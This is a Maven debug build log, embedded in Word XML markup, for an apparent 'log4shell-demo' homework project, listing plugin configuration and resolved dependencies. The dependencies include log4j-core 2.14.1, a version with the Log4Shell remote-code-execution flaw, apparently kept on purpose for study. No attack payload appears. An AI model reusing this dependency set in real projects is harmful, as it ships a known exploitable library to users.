org.apache.maven:maven-artifact-manager=org.apache.maven:maven-artifact-manager:jar:2.2.1:compile, backport-util-concurrent:backport-util-concurrent=backport-util-concurrent:backport-util-concurrent:jar:3.1:compile, org.apache.maven:maven-plugin-registry=org.apache.maven:maven-plugin-registry:jar:2.2.1:compile, org.codehaus.plexus:plexus-interpolation=org.codehaus.plexus:plexus-interpolation:jar:1.11:compile, org.apache.maven:maven-model=org.apache.maven:maven-model:jar:2.2.1:compile, org.apache.maven:maven-core=org.apache.maven:maven-core:jar:2.2.1:compile, org.apache.maven:maven-plugin-parameter-documenter=org.apache.maven:maven-plugin-parameter-documenter:jar:2.2.1:compile, org.slf4j:slf4j-jdk14=org.slf4j:slf4j-jdk14:jar:1.5.6:runtime, org.slf4j:slf4j-api=org.slf4j:slf4j-api:jar:1.5.6:runtime, org.slf4j:jcl-over-slf4j=org.slf4j:jcl-over-slf4j:jar:1.5.6:runtime, org.apache.maven.reporting:maven-reporting-api=org.apache.maven.reporting:maven-reporting-api:jar:3.0:compile, org.apache.maven:maven-repository-metadata=org.apache.maven:maven-repository-metadata:jar:2.2.1:compile, org.apache.maven:maven-error-diagnostics=org.apache.maven:maven-error-diagnostics:jar:2.2.1:compile, org.apache.maven:maven-monitor=org.apache.maven:maven-monitor:jar:2.2.1:compile, classworlds:classworlds=classworlds:classworlds:jar:1.1:compile, org.sonatype.plexus:plexus-sec-dispatcher=org.sonatype.plexus:plexus-sec-dispatcher:jar:1.3:compile, org.sonatype.plexus:plexus-cipher=org.sonatype.plexus:plexus-cipher:jar:1.4:compile, org.apache.maven:maven-toolchain=org.apache.maven:maven-toolchain:jar:2.2.1:compile, org.codehaus.plexus:plexus-java=org.codehaus.plexus:plexus-java:jar:0.9.10:compile, org.ow2.asm:asm=org.ow2.asm:asm:jar:6.2:compile, com.thoughtworks.qdox:qdox=com.thoughtworks.qdox:qdox:jar:2.0-M8:compile}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139E29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pluginDescriptor = Component Descriptor: role: 'org.apache.maven.plugin.Mojo', implementation: 'org.apache.maven.plugin.surefire.HelpMojo', role hint: 'org.apache.maven.plugins:maven-surefire-plugin:2.22.2:help'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BD2F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role: 'org.apache.maven.plugin.Mojo', implementation: 'org.apache.maven.plugin.surefire.SurefirePlugin', role hint: 'org.apache.maven.plugins:maven-surefire-plugin:2.22.2:test'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E327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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665D12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printSummary = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B932CB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projectArtifactMap = {org.springframework.boot:spring-boot-starter-web=org.springframework.boot:spring-boot-starter-web:jar:2.5.5:compile, org.springframework.boot:spring-boot-starter=org.springframework.boot:spring-boot-starter:jar:2.5.5:compile, org.springframework.boot:spring-boot=org.springframework.boot:spring-boot:jar:2.5.5:compile, org.springframework.boot:spring-boot-autoconfigure=org.springframework.boot:spring-boot-autoconfigure:jar:2.5.5:compile, org.springframework.boot:spring-boot-starter-logging=org.springframework.boot:spring-boot-starter-logging:jar:2.5.5:compile, ch.qos.logback:logback-classic=ch.qos.logback:logback-classic:jar:1.2.6:compile, ch.qos.logback:logback-core=ch.qos.logback:logback-core:jar:1.2.6:compile, org.apache.logging.log4j:log4j-to-slf4j=org.apache.logging.log4j:log4j-to-slf4j:jar:2.14.1:compile, jakarta.annotation:jakarta.annotation-api=jakarta.annotation:jakarta.annotation-api:jar:1.3.5:compile, org.springframework:spring-core=org.springframework:spring-core:jar:5.3.10:compile, org.springframework:spring-jcl=org.springframework:spring-jcl:jar:5.3.10:compile, org.yaml:snakeyaml=org.yaml:snakeyaml:jar:1.28:compile, org.springframework.boot:spring-boot-starter-json=org.springframework.boot:spring-boot-starter-json:jar:2.5.5:compile, com.fasterxml.jackson.core:jackson-databind=com.fasterxml.jackson.core:jackson-databind:jar:2.12.5:compile, com.fasterxml.jackson.core:jackson-annotations=com.fasterxml.jackson.core:jackson-annotations:jar:2.12.5:compile, com.fasterxml.jackson.core:jackson-core=com.fasterxml.jackson.core:jackson-core:jar:2.12.5:compile, com.fasterxml.jackson.datatype:jackson-datatype-jdk8=com.fasterxml.jackson.datatype:jackson-datatype-jdk8:jar:2.12.5:compile, com.fasterxml.jackson.datatype:jackson-datatype-jsr310=com.fasterxml.jackson.datatype:jackson-datatype-jsr310:jar:2.12.5:compile, com.fasterxml.jackson.module:jackson-module-parameter-names=com.fasterxml.jackson.module:jackson-module-parameter-names:jar:2.12.5:compile, org.springframework.boot:spring-boot-starter-tomcat=org.springframework.boot:spring-boot-starter-tomcat:jar:2.5.5:compile, org.apache.tomcat.embed:tomcat-embed-core=org.apache.tomcat.embed:tomcat-embed-core:jar:9.0.53:compile, org.apache.tomcat.embed:tomcat-embed-el=org.apache.tomcat.embed:tomcat-embed-el:jar:9.0.53:compile, org.apache.tomcat.embed:tomcat-embed-websocket=org.apache.tomcat.embed:tomcat-embed-websocket:jar:9.0.53:compile, org.springframework:spring-web=org.springframework:spring-web:jar:5.3.10:compile, org.springframework:spring-beans=org.springframework:spring-beans:jar:5.3.10:compile, org.springframework:spring-webmvc=org.springframework:spring-webmvc:jar:5.3.10:compile, org.springframework:spring-aop=org.springframework:spring-aop:jar:5.3.10:compile, org.springframework:spring-context=org.springframework:spring-context:jar:5.3.10:compile, org.springframework:spring-expression=org.springframework:spring-expression:jar:5.3.10:compile, org.springframework.boot:spring-boot-starter-log4j2=org.springframework.boot:spring-boot-starter-log4j2:jar:2.5.5:compile, org.apache.logging.log4j:log4j-slf4j-impl=org.apache.logging.log4j:log4j-slf4j-impl:jar:2.14.1:compile, org.slf4j:slf4j-api=org.slf4j:slf4j-api:jar:1.7.32:compile, org.apache.logging.log4j:log4j-api=org.apache.logging.log4j:log4j-api:jar:2.14.1:compile, org.apache.logging.log4j:log4j-core=org.apache.logging.log4j:log4j-core:jar:2.14.1:compile, org.apache.logging.log4j:log4j-jul=org.apache.logging.log4j:log4j-jul:jar:2.14.1:compile, org.slf4j:jul-to-slf4j=org.slf4j:jul-to-slf4j:jar:1.7.32:compile}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7827838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(s) projectBuildDirectory = /home/ec2-user/log4shell-homework/target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EECE4F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redirectTestOutputToFile = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011806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remoteRepositories = [      id: central</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B0279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url: https://repo.maven.apache.org/maven2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEC5C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layout: default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FABFF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snapshots: [enabled =&gt; false, update =&gt; daily]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646364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releases: [enabled =&gt; true, update =&gt; never]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541E15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blocked: false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212B25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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3DA46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reportFormat = brief</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD916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reportsDirectory = /home/ec2-user/log4shell-homework/target/surefire-reports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052FDC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rerunFailingTestsCount = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182F88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reuseForks = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A0979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runOrder = filesystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E431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shutdown = testset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E435E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skip = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298418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skipAfterFailureCount = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB21F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skipTests = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6C55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suiteXmlFiles = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5627D5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tempDir = surefire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513B7E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testClassesDirectory = /home/ec2-user/log4shell-homework/target/test-classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726F9A8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testFailureIgnore = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8844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testNGArtifactName = org.testng:testng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBA937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testSourceDirectory = /home/ec2-user/log4shell-homework/src/test/java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB8FA1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threadCountClasses = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5E98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threadCountMethods = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B13DC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threadCountSuites = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F9F2D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trimStackTrace = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E603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useFile = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611338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(s) useManifestOnlyJar = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395EBD6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useSystemClassLoader = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02944A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useUnlimitedThreads = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0620B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workingDirectory = /home/ec2-user/log4shell-homework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2103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project = MavenProject: com.example:log4shell-demo:0.0.1-SNAPSHOT @ /home/ec2-user/log4shell-homework/pom.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397F68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session = org.apache.maven.execution.MavenSession@2dddc1b9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E0D72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end configuration --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AB90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tests to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD8E5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5AF1FD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maven-jar-plugin:3.2.0:jar (default-jar) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A8CE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Dependency collection stats {ConflictMarker.analyzeTime=98736, ConflictMarker.markTime=44555, ConflictMarker.nodeCount=106, ConflictIdSorter.graphTime=34497, ConflictIdSorter.topsortTime=40730, ConflictIdSorter.conflictIdCount=36, ConflictIdSorter.conflictIdCycleCount=0, ConflictResolver.totalTime=523387, ConflictResolver.conflictItemCount=97, DefaultDependencyCollector.collectTime=101406320, DefaultDependencyCollector.transformTime=774840}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F613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org.apache.maven.plugins:maven-jar-plugin:jar:3.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19619C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org.apache.maven:maven-plugin-api:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C080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org.apache.maven:maven-model:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04174A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org.sonatype.sisu:sisu-inject-plexus:jar:1.4.2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9D24D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org.sonatype.sisu:sisu-inject-bean:jar:1.4.2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039A1B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org.sonatype.sisu:sisu-guice:jar:noaop:2.1.7:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2F11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org.apache.maven:maven-core:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC69A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org.apache.maven:maven-settings:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000FD9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org.apache.maven:maven-settings-builder:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B18175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org.apache.maven:maven-repository-metadata:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6644002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org.apache.maven:maven-model-builder:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C7C6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org.apache.maven:maven-aether-provider:jar:3.0:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6010EB7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org.sonatype.aether:aether-impl:jar:1.7:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0425473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org.sonatype.aether:aether-spi:jar:1.7:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2529B1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org.sonatype.aether:aether-api:jar:1.7:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8919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org.sonatype.aether:aether-util:jar:1.7:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659817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org.codehaus.plexus:plexus-interpolation:jar:1.14:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D6441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org.codehaus.plexus:plexus-classworlds:jar:2.2.3:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FE91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org.codehaus.plexus:plexus-component-annotations:jar:1.7.1:compile (version managed from default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2532EE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org.sonatype.plexus:plexus-sec-dispatcher:jar:1.3:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE428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org.sonatype.plexus:plexus-cipher:jar:1.4:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250472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org.apache.maven:maven-artifact:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A20D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org.apache.maven.shared:file-management:jar:3.0.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F567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org.apache.maven.shared:maven-shared-io:jar:3.0.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA089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org.apache.maven:maven-compat:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD7FD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org.apache.maven.wagon:wagon-provider-api:jar:2.10:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C29BA4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org.apache.maven:maven-archiver:jar:3.5.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DBA6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commons-io:commons-io:jar:2.5:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007E61B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org.apache.maven.shared:maven-shared-utils:jar:3.2.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B789D2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org.codehaus.plexus:plexus-archiver:jar:4.2.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D30AC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org.codehaus.plexus:plexus-io:jar:3.2.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F45EC8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org.apache.commons:commons-compress:jar:1.19:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789062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org.iq80.snappy:snappy:jar:0.4:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563113B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org.tukaani:xz:jar:1.8:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CD3A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org.codehaus.plexus:plexus-utils:jar:3.3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634097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Created new class realm plugin&gt;org.apache.maven.plugins:maven-jar-plugin:3.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4013D6F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Importing foreign packages into class realm plugin&gt;org.apache.maven.plugins:maven-jar-plugin:3.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5429DC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&lt; maven.api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FA2B9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Populating class realm plugin&gt;org.apache.maven.plugins:maven-jar-plugin:3.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C684D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org.apache.maven.plugins:maven-jar-plugin:jar:3.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786F20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org.sonatype.sisu:sisu-inject-bean:jar:1.4.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A32F0A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org.sonatype.sisu:sisu-guice:jar:noaop:2.1.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F475C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org.sonatype.aether:aether-util:jar:1.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBF59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org.codehaus.plexus:plexus-interpolation:jar:1.14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACF91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Included: org.codehaus.plexus:plexus-component-annotations:jar:1.7.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58130C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org.sonatype.plexus:plexus-sec-dispatcher:jar:1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD584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org.sonatype.plexus:plexus-cipher:jar:1.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3347C41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org.apache.maven.shared:file-management:jar:3.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633B62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org.apache.maven.shared:maven-shared-io:jar:3.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783249C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org.apache.maven:maven-archiver:jar:3.5.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C45A4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commons-io:commons-io:jar:2.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BFB0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org.apache.maven.shared:maven-shared-utils:jar:3.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D746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org.codehaus.plexus:plexus-archiver:jar:4.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B0030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org.codehaus.plexus:plexus-io:jar:3.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66704F2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org.apache.commons:commons-compress:jar:1.19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9A36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org.iq80.snappy:snappy:jar:0.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203B25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org.tukaani:xz:jar:1.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1808571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org.codehaus.plexus:plexus-utils:jar:3.3.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13019C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org.apache.maven.plugins:maven-jar-plugin:3.2.0:jar from plugin realm ClassRealm[plugin&gt;org.apache.maven.plugins:maven-jar-plugin:3.2.0, parent: jdk.internal.loader.ClassLoaders$AppClassLoader@4e0e2f2a]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE8DB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'org.apache.maven.plugins:maven-jar-plugin:3.2.0:jar' with basic configurator --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63303F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addDefaultImplementationEntries = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D08B63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(s) manifest = org.apache.maven.archiver.ManifestConfiguration@1a0d96a5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6243C7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archive = org.apache.maven.archiver.MavenArchiveConfiguration@5a02bfe3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3A30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classesDirectory = /home/ec2-user/log4shell-homework/target/classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C57E2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finalName = log4shell-demo-0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A2D1D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forceCreation = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B59FD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outputDirectory = /home/ec2-user/log4shell-homework/target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7663C42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project = MavenProject: com.example:log4shell-demo:0.0.1-SNAPSHOT @ /home/ec2-user/log4shell-homework/pom.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6915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session = org.apache.maven.execution.MavenSession@2dddc1b9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1659DB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skipIfEmpty = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103D41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useDefaultManifestFile = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190F52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 end configuration --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE5F2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[WARNING] JAR will be empty - no content was marked for inclusion!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F87A5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isUp2date: false (Destination /home/ec2-user/log4shell-homework/target/log4shell-demo-0.0.1-SNAPSHOT.jar not found.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EB99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jar: /home/ec2-user/log4shell-homework/target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5674E0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adding directory META-INF/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCF41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adding entry META-INF/MANIFEST.MF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161C00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adding directory META-INF/maven/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5C91C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adding directory META-INF/maven/com.example/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3951B8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adding directory META-INF/maven/com.example/log4shell-demo/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1ABAA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adding entry META-INF/maven/com.example/log4shell-demo/pom.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F775D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adding entry META-INF/maven/com.example/log4shell-demo/pom.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714EBA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46807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spring-boot-maven-plugin:2.5.5:repackage (repackage) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F29F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Dependency collection stats {ConflictMarker.analyzeTime=188118, ConflictMarker.markTime=87374, ConflictMarker.nodeCount=231, ConflictIdSorter.graphTime=48295, ConflictIdSorter.topsortTime=48187, ConflictIdSorter.conflictIdCount=74, ConflictIdSorter.conflictIdCycleCount=0, ConflictResolver.totalTime=1404662, ConflictResolver.conflictItemCount=143, DefaultDependencyCollector.collectTime=282452013, DefaultDependencyCollector.transformTime=1829751}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E620B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org.springframework.boot:spring-boot-maven-plugin:jar:2.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3281381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org.springframework.boot:spring-boot-buildpack-platform:jar:2.5.5:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2252762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com.fasterxml.jackson.core:jackson-databind:jar:2.12.5:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508B39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com.fasterxml.jackson.core:jackson-annotations:jar:2.12.5:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082863C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com.fasterxml.jackson.core:jackson-core:jar:2.12.5:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108858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com.fasterxml.jackson.module:jackson-module-parameter-names:jar:2.12.5:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C0C17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net.java.dev.jna:jna-platform:jar:5.7.0:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C9FF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net.java.dev.jna:jna:jar:5.7.0:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4DE1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org.apache.commons:commons-compress:jar:1.20:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E0C60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org.apache.httpcomponents:httpclient:jar:4.5.13:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321A6D6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org.apache.httpcomponents:httpcore:jar:4.4.13:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE33D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commons-logging:commons-logging:jar:1.2:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAF4C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commons-codec:commons-codec:jar:1.11:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7218AF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org.springframework:spring-core:jar:5.3.10:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381408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org.springframework:spring-jcl:jar:5.3.10:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738B3A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org.tomlj:tomlj:jar:1.0.0:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5A01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org.antlr:antlr4-runtime:jar:4.7.2:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE896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com.google.code.findbugs:jsr305:jar:3.0.2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DB55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org.springframework.boot:spring-boot-loader-tools:jar:2.5.5:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446912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org.apache.maven.shared:maven-common-artifact-filters:jar:3.2.0:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E04663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org.apache.maven:maven-artifact:jar:3.1.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D261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org.apache.maven:maven-model:jar:3.1.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EC14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org.apache.maven:maven-core:jar:3.1.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D2B5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org.apache.maven:maven-settings:jar:3.1.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039AC9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org.apache.maven:maven-settings-builder:jar:3.1.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643B87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org.apache.maven:maven-repository-metadata:jar:3.1.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADD1E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org.apache.maven:maven-model-builder:jar:3.1.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD5A4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org.apache.maven:maven-aether-provider:jar:3.1.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721841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org.eclipse.aether:aether-spi:jar:0.9.0.M2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A6BB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org.eclipse.aether:aether-impl:jar:0.9.0.M2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42854DC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org.codehaus.plexus:plexus-interpolation:jar:1.19:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0629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org.codehaus.plexus:plexus-component-annotations:jar:1.5.5:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7416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org.sonatype.plexus:plexus-sec-dispatcher:jar:1.3:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529033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org.sonatype.plexus:plexus-cipher:jar:1.4:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010F9B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commons-io:commons-io:jar:2.6:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECF5A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org.eclipse.aether:aether-api:jar:0.9.0.M2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CE9D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org.eclipse.aether:aether-util:jar:0.9.0.M2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287024F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org.eclipse.sisu:org.eclipse.sisu.plexus:jar:0.0.0.M5:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714696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javax.enterprise:cdi-api:jar:1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C09BCD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javax.annotation:jsr250-api:jar:1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9E71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javax.inject:javax.inject:jar:1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45723C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org.sonatype.sisu:sisu-guice:jar:no_aop:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A99857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aopalliance:aopalliance:jar:1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA1960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org.eclipse.sisu:org.eclipse.sisu.inject:jar:0.0.0.M5:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18061B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org.apache.maven.shared:maven-shared-utils:jar:3.3.3:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4E99C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org.apache.maven:maven-plugin-api:jar:3.6.3:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6EDC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org.codehaus.plexus:plexus-utils:jar:3.2.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371D9A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org.codehaus.plexus:plexus-classworlds:jar:2.6.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AFBD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org.sonatype.plexus:plexus-build-api:jar:0.0.7:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FC66D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org.apache.maven.plugins:maven-shade-plugin:jar:3.2.4:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0131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org.apache.maven.shared:maven-artifact-transfer:jar:0.12.0:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D893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org.slf4j:slf4j-api:jar:1.7.5:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB185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org.ow2.asm:asm:jar:8.0:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676256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org.ow2.asm:asm-commons:jar:8.0:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4296A07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org.ow2.asm:asm-tree:jar:8.0:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2797E2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org.ow2.asm:asm-analysis:jar:8.0:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DF1B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org.jdom:jdom2:jar:2.0.6:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7230C5D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org.apache.maven.shared:maven-dependency-tree:jar:3.0.1:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5423A0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org.vafer:jdependency:jar:2.4.0:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D9D9B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org.ow2.asm:asm-util:jar:8.0:compile (optional)</w:t>
      </w:r>
    </w:p>
